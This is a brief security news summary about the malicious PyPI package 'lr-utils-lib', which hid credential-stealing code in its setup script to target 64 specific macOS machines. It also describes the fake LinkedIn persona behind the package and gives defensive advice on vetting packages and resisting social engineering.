July 26, 2024 at 04:55PM
Researchers discovered a Python package called “lr-utils-lib” on PyPi, designed to target specific macOS machines and steal Google Cloud Platform credentials. The package conceals malicious code in its setup, posing as a legitimate package, and uses social engineering tactics. The campaign is unique due to its highly targeted nature, posing a significant risk to organizations.
Key Takeaways from Meeting Notes:
– A malicious Python code package, “lr-utils-lib,” was identified on the Python Package Index (PyPi) in June. It is designed to specifically target a limited set of macOS victims and steal Google Cloud Platform credentials.
– The malware is highly targeted and aims to infect a predetermined list of 64 specific machines. The attacker’s identity and further information about the targeted machines are currently unknown.
– Social engineering is involved, with the package owner posing as “Lucid Zenith,” claiming to be the CEO of Apex Companies LLC on LinkedIn. The fake profile has led to inconsistent responses from AI-powered search engines and chatbots.
– The campaign stands out due to the highly targeted use of open source software (OSS), which is a rare phenomenon. It is crucial for organizations to exercise vigilance and critical thinking in their software supply chain, including thorough verification of package sources and contents.
– To defend against such attacks, it is recommended to stay vigilant during software upgrades, be cautious of social engineering attacks, and verify the contents of setup scripts when installing packages. Additionally, there is a need for multi-source verification and fostering a culture of critical thinking in information verification processes.